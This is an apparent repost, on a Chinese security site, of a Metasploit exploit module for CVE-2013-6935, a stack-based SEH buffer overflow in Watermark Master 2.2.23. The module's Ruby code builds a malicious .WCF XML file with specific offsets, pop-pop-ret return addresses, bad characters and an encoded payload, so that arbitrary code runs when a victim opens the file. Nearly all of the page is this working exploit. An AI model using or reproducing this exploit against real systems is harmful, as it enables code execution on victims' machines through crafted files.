首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Watermark Master Buffer Overflow (SEH)
来源:metasploit.com 作者:Smith 发布时间:2015-10-08  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'    => 'Watermark Master Buffer Overflow (SEH)',
      'Description'  => %q{
          This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when
          processing a specially crafted .WCF file. This vulnerability could be
          exploited by a remote attacker to execute arbitrary code on the target
          machine by enticing a user of Watermark Master to open a malicious .WCF file.
      },
      'License'    => MSF_LICENSE,
      'Author'    =>
        [
          'metacom',  # Original discovery
          'Andrew Smith',  # MSF Module
        ],
      'References'  =>
        [
          [ 'OSVDB', '99226' ],
          [ 'CVE', '2013-6935'],
          [ 'EBD', '29327' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Platform'  => 'win',
      'Payload'  =>
        {
          'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
          'DisableNops' => false,
          'Space' => 7276
        },

      'Targets'    =>
        [
          [ 'Windows 7 x32 - Watermark Master 2.2.23',
            {
              'Ret'     =>  0x10015f2d, #p/p/r | CommonClassesMFC.dll
              'Offset'  =>  516
            }
          ],
          [ 'Windows 7 x64 - Watermark Master 2.2.23',
            {
              'Ret'     =>  0x1001329a, #p/p/r | CommonClassesMFC.dll
              'Offset'  =>  516
            }
          ],
        ],
      'Privileged'  => false,
      'DisclosureDate'  => 'Nov 1 2013',
      'DefaultTarget'  => 0))

    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.wcf']),], self.class)

  end

  def exploit

    buffer = rand_text(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded
    buffer << rand_text(18000 - buffer.length)

    file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.2.23.00">
<cols name="Files"/>
<cols name="Profiles">
<Property name="Profile">
<cols name="Watermarks"/>
<cols name="Timelines"/>
<cols name="Streams">
<Property name="Stream">
<Value name="SourcePath" type="8" value="#{buffer}"/>
</Property>
</cols>
<cols name=""/>
</Property>
</cols>
</config>|

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(file)

  end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IconLover 5.42 - Local Buffer
·ManageEngine ServiceDesk Plus
·ManageEngine EventLog Analyzer
·RedHat Enterprise Linux 7.1 De
·BisonWare BisonFTP Server 3.5
·LanSpy 2.0.0.155 - Buffer Over
·PCMan FTP Server 2.0.7 - Direc
·LanWhoIs.exe 1.0.1.120 - Stack
·Watchguard XCS Remote Command
·Last PassBroker 3.2.16 - Stack
·Watchguard XCS FixCorruptMail
·WinRaR SFX Remote Code Executi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved